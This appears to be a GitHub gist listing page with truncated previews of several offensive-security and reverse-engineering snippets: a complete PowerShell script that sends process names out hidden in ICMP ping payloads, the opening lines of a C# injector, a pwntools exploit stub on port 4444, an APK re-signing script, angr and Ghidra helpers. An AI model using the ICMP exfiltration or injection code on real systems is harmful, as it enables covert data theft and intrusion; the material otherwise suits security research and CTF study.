This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$dst = "127.0.0.1"; | |
$data = Get-Process | Select-Object -ExpandProperty Name | Out-String ; | |
$data = [System.Text.Encoding]::Ascii.GetBytes($data); | |
$options =(New-Object System.Net.NetworkInformation.PingOptions(64, $true)); | |
$blocksize = 1400; | |
for($i=0; $i -lt $data.Length; $i+=$blocksize) { | |
$block = $data[$i..($i + $blocksize -1)]; | |
(New-Object System.Net.NetworkInformation.Ping).Send($dst, 10, $block, $options); | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Compile: | |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe inject.cs | |
*/ | |
using System; | |
using System.Runtime.InteropServices; | |
using System.Diagnostics; | |
using System.Net; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# context(arch='x86_64') | |
context(arch='i386') | |
host = 'localhost' | |
port = 4444 | |
if context.arch == 'i386': | |
sock = 'edx' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
KEYSTORE=my.keystore | |
KEYSTORE_ALIAS=myalias | |
PASSWORD=password | |
APK=some.apk | |
if [ ! -f ${KEYSTORE} ]; then | |
keytool -noprompt -genkey -v -keystore ${KEYSTORE} -alias ${KEYSTORE_ALIAS} -keyalg RSA -keysize 2048 -validity 1000 -dname "CN=frank" -storepass ${PASSWORD} -keypass ${PASSWORD} | |
fi |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
KEYSTORE=my.keystore | |
KEYSTORE_ALIAS=myalias | |
PASSWORD=password | |
APK=some.apk | |
if [ ! -f ${KEYSTORE} ]; then | |
keytool -noprompt -genkey -v -keystore ${KEYSTORE} -alias ${KEYSTORE_ALIAS} -keyalg RSA -keysize 2048 -validity 1000 -dname "CN=frank" -storepass ${PASSWORD} -keypass ${PASSWORD} | |
fi |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import angr | |
import claripy | |
proj = angr.Project('./test', main_opts={'custom_base_addr': 0x00100000}) | |
arg1 = claripy.BVS('arg1', 8) | |
state = proj.factory.call_state(proj.loader.find_symbol('check').rebased_addr, arg1) | |
sm = proj.factory.simgr(state) | |
sm.explore(find=lambda s: b"You win" in s.posix.dumps(1)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#TODO write a description for this script | |
#@author | |
#@category _NEW_ | |
#@keybinding | |
#@menupath | |
#@toolbar | |
#TODO Add User Code Here | |
def getFunctions(): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import tempfile | |
import os | |
import logging | |
import shutil | |
import subprocess | |
import re | |
try: | |
log |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import scrapy | |
import argparse | |
import re | |
from scrapy import signals | |
from scrapy.spiders import CrawlSpider, Rule | |
from scrapy.linkextractors import LinkExtractor | |
from scrapy.crawler import CrawlerProcess | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<style> | |
#container { | |
font-size: 50px; | |
color: white; | |
width: 400px; | |
height: 260px; | |
} | |
#content { |